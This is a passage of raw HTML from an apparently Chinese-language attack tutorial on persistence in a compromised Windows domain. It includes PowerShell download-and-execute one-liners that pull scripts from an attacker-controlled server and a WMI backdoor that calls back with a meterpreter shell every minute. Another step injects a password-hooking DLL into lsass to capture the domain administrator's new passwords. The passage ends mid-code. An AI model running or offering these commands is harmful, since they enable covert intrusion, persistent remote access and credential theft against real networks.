inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">System</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;http://10.101.101.16/chm.ps1&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">执行之后，每分钟会反弹一个meterpreter的shell，而且重启后依然会反弹：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hibq9a7j21660eg1kx.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">Ps:&nbsp;这个wmi的后门我在Win10上实验的时候不能执行&nbsp;Payload&nbsp;，如果触发到后门的触发条件的话，&nbsp;Win10&nbsp;会弹出&nbsp;openwith.exe&nbsp;这个进程，界面上看就是这个：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><br/><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hjbkw1cj20ga0lpgms.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">查了两天资料也没有找到一个正经的解决方法，但是后来把&nbsp;openwith.exe&nbsp;换成&nbsp;cmd.exe&nbsp;就可以执行&nbsp;Payload&nbsp;了，因为&nbsp;win7&nbsp;和&nbsp;win2008&nbsp;没有&nbsp;openwith&nbsp;，所以没有遇到什么阻力就直接执行Payload，但是&nbsp;Win10&nbsp;和&nbsp;Win8&nbsp;在正常情况下就会打开&nbsp;openwith</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hkg4vpsj20to0bx45f.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">最后，我还想放置一个后们，在域控管理员改密码的时候记录他的新密码[<a href="http://wooyun.jozxing.cc/static/drops/tips-13079.html" class="external" target="_blank" style="box-sizing: border-box; margin: 0px; padding: 0px; border-width: 0px 0px 2px; border-top-style: initial; border-right-style: initial; border-bottom-style: solid; border-left-style: initial; border-top-color: initial; border-right-color: initial; border-bottom-color: rgb(234, 234, 234); border-left-color: initial; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; transition: all 0.2s ease 0s; text-decoration: none; color: rgb(81, 173, 237);">参考</a>]，注意他的脚本里面有一个选项可以从你的&nbsp;Web&nbsp;服务器加载一个dll到对方主机内存里面，这样你把你的dll生成好之后就可以放在你的&nbsp;Web&nbsp;服务器下面，在这个ps1最下面加入</p><div id="crayon-5c25a60d4f82c109316272" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 708.8px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f82c109316272-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">ReflectivePEInjection</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">PEUrl</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.16/HookPasswordChange.dll&nbsp;–procname&nbsp;lsass</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">然后你把这个脚本的调用加入到chm.ps1里面，下面是改动之后chm.ps1里面的内容：</p><div id="crayon-5c25a60d4f831852981309" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">2</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">3</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 1660px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f831852981309-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 